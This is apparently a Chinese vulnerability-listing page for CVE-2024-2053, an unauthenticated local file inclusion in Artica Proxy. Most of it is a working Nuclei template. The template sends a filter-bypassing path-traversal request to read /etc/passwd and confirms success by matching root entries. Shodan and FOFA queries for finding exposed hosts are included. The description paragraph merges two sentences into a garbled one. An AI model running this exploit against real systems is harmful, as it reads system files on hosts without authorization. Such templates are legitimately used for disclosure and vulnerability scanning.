CVE-2024-2053: Artica Proxy - Unauthenticated LFI

日期: 2025-08-01 | 影响软件: Artica Proxy | POC: 已公开

漏洞描述

The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user.

PoC代码[已公开]

id: CVE-2024-2053

info:
  name: Artica Proxy  - Unauthenticated LFI
  author: pussycat0x
  severity: high
  description: |
    The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user.
  reference:
    - https://github.com/0xMarcio/cve/blob/main/2024/CVE-2024-2053.md#cve-2024-2053
    - https://seclists.org/fulldisclosure/2024/Mar/11
    - https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-2053
    cwe-id: CWE-23
    epss-score: 0.29312
    epss-percentile: 0.96443
    cpe: cpe:2.3:a:articatech:artica_proxy:4.40:*:*:*:*:*:*:*
  metadata:
    vendor: articatech
    product: artica_proxy
    shodan-query: http.html:"artica"
    fofa-query: body="artica"
    verified: true
    max-request: 1
  tags: cve,cve2024,lfi,artica-proxy,articatech

http:
  - raw:
      - |
        GET /images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: body
        words:
          - "application/force-download"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b314fb2d84357e802242d4ac68a68f7a9818c389dd695cc44e0b1f07f3fdfe420220726aa5936d5bb836a7a0fd3c79bdd17a520102b5b469b4c385f6b5868744153a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐